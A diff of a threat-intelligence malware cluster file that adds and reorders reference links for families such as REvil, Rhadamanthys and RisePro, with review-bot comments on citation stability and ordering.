+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles",
+ "https://home.treasury.gov/news/press-releases/jy0471",
+ "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
+ "https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html",
+ "https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ",
+ "https://twitter.com/VK_Intel/status/1411066870350942213",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
+ "https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://thehackernews.com/2022/03/ukrainian-hacker-linked-to-revil.html",
+ "https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://cocomelonc.github.io/malware/2023/02/02/malware-analysis-7.html",
+ "https://www.acronis.com/en-sg/articles/sodinokibi-ransomware/",
+ "https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent",
+ "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom",
+ "https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.cyjax.com/2021/07/09/revilevolution/",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html",
+ "https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/",
+ "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/",
+ "https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/",
+ "https://www.flashpoint-intel.com/blog/revil-disappears-again/",
+ "https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/",
+ "https://threatpost.com/ransomware-revil-sites-disappears/167745/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://securelist.com/ransomware-world-in-2021/102169/",
+ "https://twitter.com/SyscallE/status/1411074271875670022",
+ "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa",
+ "https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/",
+ "https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40",
+ "https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/",
+ "https://twitter.com/fwosar/status/1411281334870368260",
+ "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/",
+ "https://www.kpn.com/security-blogs/Tracking-REvil.htm",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/",
+ "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
+ "https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004",
+ "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/",
+ "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses",
+ "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
+ "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://www.youtube.com/watch?v=P8o6GItci5w",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/",
+ "https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions",
+ "https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack",
+ "https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged",
+ "https://www.secureworks.com/research/lv-ransomware",
+ "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html",
+ "https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/",
+ "https://twitter.com/fwosar/status/1420119812815138824",
+ "https://hatching.io/blog/ransomware-part2",
+ "https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/",
+ "https://vimeo.com/449849549",
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope",
+ "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf",
+ "https://redcanary.com/blog/uncompromised-kaseya/",
+ "https://twitter.com/R3MRUM/status/1412064882623713283",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
+ "https://blog.group-ib.com/REvil_RaaS",
+ "https://twitter.com/LloydLabs/status/1411098844209819648",
+ "https://twitter.com/SophosLabs/status/1412056467201462276",
+ "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
+ "https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident",
+ "https://velzart.nl/blog/ransomeware/",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/",
+ "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/",
+ "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2022-05-01-revil-reborn-ransom.vk.cfg.txt",
+ "https://intel471.com/blog/changes-in-revil-ransomware-version-2-2",
+ "https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html",
+ "https://community.riskiq.com/article/3315064b",
+ "https://twitter.com/SophosLabs/status/1413616952313004040?s=20",
+ "https://threatintel.blog/OPBlueRaven-Part1/",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/",
+ "https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain",
+ "https://twitter.com/resecurity_com/status/1412662343796813827",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/",
+ "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf",
+ "https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/",
+ "https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://www.youtube.com/watch?v=QYQQUUpU04s",
+ "https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process",
+ "https://www.certego.net/en/news/malware-tales-sodinokibi/",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20",
+ "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend",
+ "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b",
+ "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021",
+ "https://news.sophos.com/en-us/2021/06/30/what-to-expect-when-youve-been-hit-with-revil-ransomware/",
+ "https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/",
+ "https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json",
+ "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
"https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://www.secureworks.com/research/revil-sodinokibi-ransomware",
+ "https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/",
+ "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment",
+ "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/",
+ "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya",
+ "https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/",
+ "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
+ "https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/",
+ "https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/",
+ "https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/",
+ "https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/",
+ "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights",
"https://www.youtube.com/watch?v=tZVFMVm5GAk",
- "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/"
+ "https://www.zscaler.com/blogs/security-research/kaseya-supply-chain-ransomware-attack-technical-analysis-revil-payload",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-gangs-web-sites-mysteriously-shut-down/",
+ "https://www.bankinfosecurity.com/interviews/ransomware-files-episode-6-kaseya-revil-i-5045",
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://ke-la.com/will-the-revils-story-finally-be-over/",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/",
+ "https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html",
+ "https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/",
+ "https://securelist.com/sodin-ransomware/91473/",
+ "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version",
+ "https://asec.ahnlab.com/ko/19860/",
+ "https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/",
+ "https://securityscorecard.com/research/a-detailed-analysis-of-the-last-version-of-revil-ransomware",
+ "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html",
+ "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/",
+ "https://analyst1.com/file-assets/History-of-REvil.pdf",
+ "https://twitter.com/_alex_il_/status/1412403420217159694",
+ "https://twitter.com/svch0st/status/1411537562380816384",
+ "https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20",
+ "https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html",
+ "https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/",
+ "https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-southfield",
+ "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
+ "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
+ "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html",
+ "https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html",
+ "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://blog.amossys.fr/sodinokibi-malware-analysis.html",
+ "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/",
+ "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/",
+ "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/",
+ "https://www.connectwise.com/resources/revil-profile",
+ "https://isc.sans.edu/diary/27012",
+ "https://www.hsgac.senate.gov/media/minority-media/new-portman-report-demonstrates-threat-ransomware-presents-to-the-united-states",
+ "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs"
],
"synonyms": [
"Sodin",
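Review bot: several of the added REvil references carry tracking parameters that should be stripped before they are committed as canonical refs: the CrowdStrike URL ending in `?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout` and the Twitter status URLs ending in `?s=20`. Also worth a second look: the Google Docs/Drive links (`docs.google.com/spreadsheets/...`, `drive.google.com/file/...`) and the Kaseya Box share are not stable citations; an archived `web.archive.org` copy, as this same list already uses for the Group-IB report, would be more durable.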
@@ -39558,16 +41635,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor",
- "https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/",
"https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf",
- "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf",
"https://www.secureworks.com/research/threat-profiles/cobalt-lyceum",
"https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
- "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/",
- "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
+ "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf",
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/",
"https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view",
+ "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/",
+ "https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/",
"https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/"
+ "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran"
],
"synonyms": [],
"type": []
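Review bot: this hunk only reorders the RGDoor refs (every removed URL is re-added, no net change). The same pure reorder repeats below for Rietspoof, Rifdoor, RMS, RobbinHood and RockLoader, which suggests the generator does not emit `refs` in a deterministic order; sorting them (or preserving source order) would stop regenerations from producing diff noise and would leave the genuine additions reviewable.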
@@ -39575,6 +41652,26 @@
"uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1",
"value": "RGDoor"
},
+ {
+ "description": "According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.\r\n\r\nAt the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys",
+ "https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web",
+ "https://threatmon.io/rhadamanthys-stealer-analysis-threatmon/",
+ "https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88",
+ "https://www.malware-traffic-analysis.net/2023/01/03/index.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023",
+ "https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/",
+ "https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "50d322d7-c7e0-4d9b-9996-e5767caa8f1c",
+ "value": "Rhadamanthys"
+ },
{
"description": "Ransomware.",
"meta": {
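Review bot: the Rhadamanthys description opens with "According to PCrisk" but no PCrisk URL appears in its `refs`; add the source so the quoted text is traceable. "At the time of writing" in a static cluster description also ages silently; anchoring it to a date, or to the Cyble and Check Point write-ups already listed, would keep it meaningful.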
@@ -39606,8 +41703,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-spoofing-reeds-rietspoof/",
"https://blog.avast.com/rietspoof-malware-increases-activity",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-spoofing-reeds-rietspoof/",
"https://decoded.avast.io/threatintel/spoofing-in-the-reeds-with-rietspoof/"
],
"synonyms": [],
@@ -39621,8 +41718,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/"
],
"synonyms": [],
@@ -39671,14 +41768,27 @@
"uuid": "a85b0619-ed8e-4324-8603-af211d682dac",
"value": "Ripper ATM"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.risepro",
+ "https://blog.sekoia.io/new-risepro-stealer-distributed-by-the-prominent-privateloader/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "20ba0ede-454c-461d-a0e1-c053a838faa2",
+ "value": "RisePro"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun",
+ "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
"https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/",
"https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
- "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
],
"synonyms": [],
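Review bot: the new RisePro entry ships with `"description": ""`. A one-line description drawn from the cited Sekoia post (whose slug identifies RisePro as a stealer distributed by PrivateLoader) would make the cluster useful when rendered, consistent with the Rhadamanthys entry added in this same change. The Rising Sun refs change in this hunk is a pure reorder.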
@@ -39692,7 +41802,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rm3",
- "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/"
+ "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
+ "https://twitter.com/URSNIFleak"
],
"synonyms": [],
"type": []
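Review bot: `https://twitter.com/URSNIFleak` is a bare profile URL rather than a specific post; the other Twitter references in this file point at `/status/<id>` permalinks (for example `https://twitter.com/VK_Intel/status/1121440931759128576`), which can be archived and checked. Link the specific tweet, or an archived copy, so the reference stays verifiable if the account is removed.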
@@ -39705,14 +41816,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rms",
- "https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/",
- "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf",
- "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/",
- "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf",
- "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
+ "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
"https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf",
- "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/"
+ "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf",
+ "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
+ "https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/",
+ "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/",
+ "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf"
],
"synonyms": [
"Gussdoor",
@@ -39728,25 +41839,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.robinhood",
- "https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
"https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf",
- "https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/",
- "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/",
+ "https://goggleheadedhacker.com/blog/post/12",
"https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
"https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://blogs.quickheal.com/a-new-ransomware-goodwill-hacks-the-victims-for-charity-read-more-to-know-more-about-this-ransomware-and-how-it-affects-its-victims/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
"https://twitter.com/VK_Intel/status/1121440931759128576",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
"https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/",
"https://www.sentinelone.com/blog/robinhood-ransomware-coolmaker-function-not-cool/",
- "https://krebsonsecurity.com/2019/06/report-no-eternal-blue-exploit-found-in-baltimore-city-ransomware/",
- "https://goggleheadedhacker.com/blog/post/12",
